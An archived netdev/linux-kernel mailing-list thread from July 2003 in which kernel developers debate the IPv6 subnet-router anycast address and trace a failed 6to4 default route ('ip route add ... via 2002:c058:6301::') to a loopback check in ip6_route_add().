http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3944 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 11:46:00 +0300 (EEST)), Pekka Savola says: > > I don't like this > > while I would be ok to have configuration option > > not to support anycast. > > With "not to support anycast" you probably meant "not to support > subnet-router anycast address [automatically, in the kernel, as now]" ? > These are entirely different things. I meant disabling anycast entirely. > (Note that if there's a user-level API for setting anycast addresses, one > could kick the subnet-router anycast address out of the kernel too. > Whether that's desirable is another thing.) We have but we cannot; it is refcnt'ed. --yoshfuji From mika.penttila@kolumbus.fi Fri Jul 11 02:33:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 02:33:53 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B9Xf2x009008 for ; Fri, 11 Jul 2003 02:33:43 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071112345896:20188 ; Fri, 11 Jul 2003 12:34:58 +0300 Message-ID: <3F0E85E6.7050001@kolumbus.fi> Date: Fri, 11 Jul 2003 12:39:50 +0300 From: =?ISO-8859-1?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: YOSHIFUJI@oss.sgi.com CC: pekkas@netcore.fi, mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> <20030711.180449.126456521.yoshfuji@linux-ipv6.org> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 11.07.2003 12:34:59, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 12:34:29, Serialize complete at 11.07.2003 12:34:29 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii; format=flowed X-archive-position: 3945 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev Who adds the subnet router anycast address, kernel itself? Since what? I don't see this in 2.5. --Mika YOSHIFUJI Hideaki / ???? wrote: >In article (at Fri, 11 Jul 2003 11:46:00 +0300 (EEST)), Pekka Savola says: > > > >>>I don't like this >>>while I would be ok to have configuration option >>>not to support anycast. >>> >>> >>With "not to support anycast" you probably meant "not to support >>subnet-router anycast address [automatically, in the kernel, as now]" ? >>These are entirely different things. >> >> > >I meant disabling anycast entirely. > > > >>(Note that if there's a user-level API for setting anycast addresses, one >>could kick the subnet-router anycast address out of the kernel too. >>Whether that's desirable is another thing.) >> >> > >We have but we cannot; it is refcnt'ed. > >--yoshfuji >- >To unsubscribe from this list: send the line "unsubscribe linux-kernel" in >the body of a message to majordomo@vger.kernel.org >More majordomo info at http://vger.kernel.org/majordomo-info.html >Please read the FAQ at http://www.tux.org/lkml/ > > > From pekkas@netcore.fi Fri Jul 11 03:04:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:04:14 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BA492x011008 for ; Fri, 11 Jul 2003 03:04:10 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BA3sb27113; Fri, 11 Jul 2003 13:03:55 +0300 Date: Fri, 11 Jul 2003 13:03:54 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.180449.126456521.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3946 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 11:46:00 +0300 (EEST)), Pekka Savola says: > > > I don't like this > > > while I would be ok to have configuration option > > > not to support anycast. > > > > With "not to support anycast" you probably meant "not to support > > subnet-router anycast address [automatically, in the kernel, as now]" ? > > These are entirely different things. > > I meant disabling anycast entirely. Oh, I'm not advocating that; however, being able to turn off the subnet router anycast address might be a plus. > > (Note that if there's a user-level API for setting anycast addresses, one > > could kick the subnet-router anycast address out of the kernel too. > > Whether that's desirable is another thing.) > > We have but we cannot; it is refcnt'ed. I don't understand what you mean. Refcnt'ed by a userland process, so that if you'd want the subnet-router anycast address, the whole time a process (like radvd) should be running.. or what? -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 03:45:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:45:54 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAjh2x011810 for ; Fri, 11 Jul 2003 03:45:46 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6BAlDBo021370; Fri, 11 Jul 2003 19:47:13 +0900 Date: Fri, 11 Jul 2003 19:47:13 +0900 (JST) Message-Id: <20030711.194713.21412719.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.180449.126456521.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3947 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), Pekka Savola says: > > We have but we cannot; it is refcnt'ed. > > I don't understand what you mean. Refcnt'ed by a userland process, so > that if you'd want the subnet-router anycast address, the whole time a > process (like radvd) should be running.. or what? Kernel has refcnt for subnet router anycast address. Ref/dereference from userspace is done via socket. You cannot derefer subnet router anycast address from userspace if the socket hasn't refered it. --yoshfuji From pekkas@netcore.fi Fri Jul 11 03:48:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:48:07 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAm12x012045 for ; Fri, 11 Jul 2003 03:48:02 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BAlmF27388; Fri, 11 Jul 2003 13:47:48 +0300 Date: Fri, 11 Jul 2003 13:47:48 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.194713.21412719.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3948 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), Pekka Savola says: > > > > We have but we cannot; it is refcnt'ed. > > > > I don't understand what you mean. Refcnt'ed by a userland process, so > > that if you'd want the subnet-router anycast address, the whole time a > > process (like radvd) should be running.. or what? > > Kernel has refcnt for subnet router anycast address. > Ref/dereference from userspace is done via socket. > You cannot derefer subnet router anycast address > from userspace if the socket hasn't refered it. So? The point is that subnet router anycast address *could* be referenced explicitly by a user-land socket (e.g. by radvd), not kernel at all. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 03:57:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:57:52 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAvl2x012509 for ; Fri, 11 Jul 2003 03:57:48 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6BAxHBo021461; Fri, 11 Jul 2003 19:59:17 +0900 Date: Fri, 11 Jul 2003 19:59:17 +0900 (JST) Message-Id: <20030711.195917.89662318.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.194713.21412719.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3949 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 13:47:48 +0300 (EEST)), Pekka Savola says: > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > > In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), Pekka Savola says: > > > > > > We have but we cannot; it is refcnt'ed. > > > > > > I don't understand what you mean. Refcnt'ed by a userland process, so > > > that if you'd want the subnet-router anycast address, the whole time a > > > process (like radvd) should be running.. or what? > > > > Kernel has refcnt for subnet router anycast address. > > Ref/dereference from userspace is done via socket. > > You cannot derefer subnet router anycast address > > from userspace if the socket hasn't refered it. > > So? The point is that subnet router anycast address *could* be referenced > explicitly by a user-land socket (e.g. by radvd), not kernel at all. So, you cannot remove subnet router anycast address from kernel via this interface; kernel keeps one reference. (Hmm, I may misunderstand your mail...) --yoshfuji From pekkas@netcore.fi Fri Jul 11 03:59:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 03:59:32 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BAxR2x012782 for ; Fri, 11 Jul 2003 03:59:28 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BAxFv27493; Fri, 11 Jul 2003 13:59:15 +0300 Date: Fri, 11 Jul 2003 13:59:14 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.195917.89662318.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3950 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 13:47:48 +0300 (EEST)), Pekka Savola says: > > > On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > > > In article (at Fri, 11 Jul 2003 13:03:54 +0300 (EEST)), Pekka Savola says: > > > > > > > > We have but we cannot; it is refcnt'ed. > > > > > > > > I don't understand what you mean. Refcnt'ed by a userland process, so > > > > that if you'd want the subnet-router anycast address, the whole time a > > > > process (like radvd) should be running.. or what? > > > > > > Kernel has refcnt for subnet router anycast address. > > > Ref/dereference from userspace is done via socket. > > > You cannot derefer subnet router anycast address > > > from userspace if the socket hasn't refered it. > > > > So? The point is that subnet router anycast address *could* be referenced > > explicitly by a user-land socket (e.g. by radvd), not kernel at all. > > So, you cannot remove subnet router anycast address from > kernel via this interface; kernel keeps one reference. .. which is why kernel shouldn't keep *any* reference *at all*! > (Hmm, I may misunderstand your mail...) .. seems like it.. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 04:02:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:02:32 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BB2R2x013326 for ; Fri, 11 Jul 2003 04:02:28 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6BB3wBo021516; Fri, 11 Jul 2003 20:03:58 +0900 Date: Fri, 11 Jul 2003 20:03:57 +0900 (JST) Message-Id: <20030711.200357.33143193.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.195917.89662318.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3951 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 13:59:14 +0300 (EEST)), Pekka Savola says: > > So, you cannot remove subnet router anycast address from > > kernel via this interface; kernel keeps one reference. > > .. which is why kernel shouldn't keep *any* reference *at all*! No, it is because REQUIRED and UNREMOVABLE anycast address. I don't think it is good to change this. --yoshfuji From pekkas@netcore.fi Fri Jul 11 04:04:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:04:54 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BB4g2x013789 for ; Fri, 11 Jul 2003 04:04:43 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BB4TA27579; Fri, 11 Jul 2003 14:04:29 +0300 Date: Fri, 11 Jul 2003 14:04:28 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.200357.33143193.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3952 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 13:59:14 +0300 (EEST)), Pekka Savola says: > > > > So, you cannot remove subnet router anycast address from > > > kernel via this interface; kernel keeps one reference. > > > > .. which is why kernel shouldn't keep *any* reference *at all*! > > No, it is because REQUIRED and UNREMOVABLE anycast address. Smells like a circular requirement :-) > I don't think it is good to change this. That's another issue entirely. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Fri Jul 11 04:36:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:36:54 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BBah2x014426 for ; Fri, 11 Jul 2003 04:36:45 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BBab5n001216; Fri, 11 Jul 2003 14:36:37 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BBaaSN001215; Fri, 11 Jul 2003 14:36:36 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Pekka Savola Cc: Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057923396.893.16.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 14:36:36 +0300 X-archive-position: 3953 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev Ok, Here's a valid use for subnet router anycase that isn't working. Somebody asked me how to set up 6to4, so I did a little testing. Doesn't work: hades:~# ip route add ::/0 via 2002:c058:6301:: RTNETLINK answers: Invalid argument Works: hades:~# ip route add ::/0 via 2002:c058:6301::1 Unfortunately the first form is what I need: hades:~# host -t AAAA 6to4.ipv6.funet.fi 6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624 6to4.ipv6.funet.fi has AAAA address 2002:c058:6301:: So apparently there really is an inappropriate subnet router anycast sanity check. Please fix this! MikaL On Fri, 2003-07-11 at 08:22, Pekka Savola wrote: > On 11 Jul 2003, Mika Liljeberg wrote: > > On Fri, 2003-07-11 at 07:51, Pekka Savola wrote: > > > Well, the system may make some sense, but IMHO, there is still zero sense > > > in policing this thing when you add a route. That's just plain bogus. > > > This is a bug which must be fixed ASAP. > > > > Correct me if I'm wrong but I think in this case the interface had > > forwarding enabled and the sanity check in fact prevented a default > > route pointing to the node itself from being configured. > > > > Otherwise I fully agree. The subnet router anycast address doesn't > > warrant any special handling. > > If that's the case, it's OK -- it's OK, I don't remember the details. > > (It might be nice to have configurable /proc option on whether to enable > the subnet router anycast address at all, but that's also a different > story..) From pekkas@netcore.fi Fri Jul 11 04:49:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 04:49:15 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BBn32x015072 for ; Fri, 11 Jul 2003 04:49:05 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6BBms527932; Fri, 11 Jul 2003 14:48:54 +0300 Date: Fri, 11 Jul 2003 14:48:54 +0300 (EEST) From: Pekka Savola To: Mika Liljeberg cc: Andre Tomt , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <1057923396.893.16.camel@hades> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3954 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 11 Jul 2003, Mika Liljeberg wrote: > Here's a valid use for subnet router anycase that isn't working. > Somebody asked me how to set up 6to4, so I did a little testing. > > Doesn't work: > > hades:~# ip route add ::/0 via 2002:c058:6301:: > RTNETLINK answers: Invalid argument > > Works: > > hades:~# ip route add ::/0 via 2002:c058:6301::1 > > Unfortunately the first form is what I need: > > hades:~# host -t AAAA 6to4.ipv6.funet.fi > 6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624 > 6to4.ipv6.funet.fi has AAAA address 2002:c058:6301:: I think that in this particular case, if should have configured your interface address with 2002:v4:addr::/16, of which subnet anycast router address would be 2002::. > So apparently there really is an inappropriate subnet router anycast > sanity check. Please fix this! This *may* be caused by another issue too: nexthop's must be given in the compatible "::192.88.99.1" format, not 2002:xxxx :-( I sent a patch on over a year or so ago, but it didn't gain that much enthusiasm.. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Fri Jul 11 05:09:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 05:09:44 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BC9V2x015580 for ; Fri, 11 Jul 2003 05:09:33 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BC9S5n001368; Fri, 11 Jul 2003 15:09:28 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BC9QBr001367; Fri, 11 Jul 2003 15:09:26 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Pekka Savola Cc: Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057925366.896.24.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 15:09:26 +0300 X-archive-position: 3955 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 14:48, Pekka Savola wrote: > On 11 Jul 2003, Mika Liljeberg wrote: > > Here's a valid use for subnet router anycase that isn't working. > > Somebody asked me how to set up 6to4, so I did a little testing. > > > > Doesn't work: > > > > hades:~# ip route add ::/0 via 2002:c058:6301:: > > RTNETLINK answers: Invalid argument > > > > Works: > > > > hades:~# ip route add ::/0 via 2002:c058:6301::1 > > > > Unfortunately the first form is what I need: > > > > hades:~# host -t AAAA 6to4.ipv6.funet.fi > > 6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624 > > 6to4.ipv6.funet.fi has AAAA address 2002:c058:6301:: > > I think that in this particular case, if should have configured your > interface address with 2002:v4:addr::/16, of which subnet anycast router > address would be 2002::. Ah ok. It *is* configured with a /16. As far as my host is concerned, 2002:c058:6301:: should be just a unicast address like any other, so maybe there is a IID==0 check somewhere? > > So apparently there really is an inappropriate subnet router anycast > > sanity check. Please fix this! > > This *may* be caused by another issue too: nexthop's must be given in the > compatible "::192.88.99.1" format, not 2002:xxxx :-( > > I sent a patch on over a year or so ago, but it didn't gain that much > enthusiasm.. I vote for fixing this too. :-) MikaL From mika.penttila@kolumbus.fi Fri Jul 11 05:42:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 05:42:45 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BCgW2x016093 for ; Fri, 11 Jul 2003 05:42:34 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071115434861:20294 ; Fri, 11 Jul 2003 15:43:48 +0300 Message-ID: <3F0EB227.50403@kolumbus.fi> Date: Fri, 11 Jul 2003 15:48:39 +0300 From: =?ISO-8859-15?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Mika Liljeberg CC: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <1057925366.896.24.camel@hades> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 11.07.2003 15:43:48, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 15:43:20, Serialize complete at 11.07.2003 15:43:20 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=ISO-8859-15; format=flowed X-archive-position: 3956 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev It turns out to be the (otherwise valid) check for IFF_LOOPBACK for gateway's address in ip6_route_add() that gives EINVAL for prefix::, and has nothing to do with iid being 0, just a coinsidence.... --Mika Mika Liljeberg wrote: >On Fri, 2003-07-11 at 14:48, Pekka Savola wrote: > > >>On 11 Jul 2003, Mika Liljeberg wrote: >> >> >>>Here's a valid use for subnet router anycase that isn't working. >>>Somebody asked me how to set up 6to4, so I did a little testing. >>> >>>Doesn't work: >>> >>>hades:~# ip route add ::/0 via 2002:c058:6301:: >>>RTNETLINK answers: Invalid argument 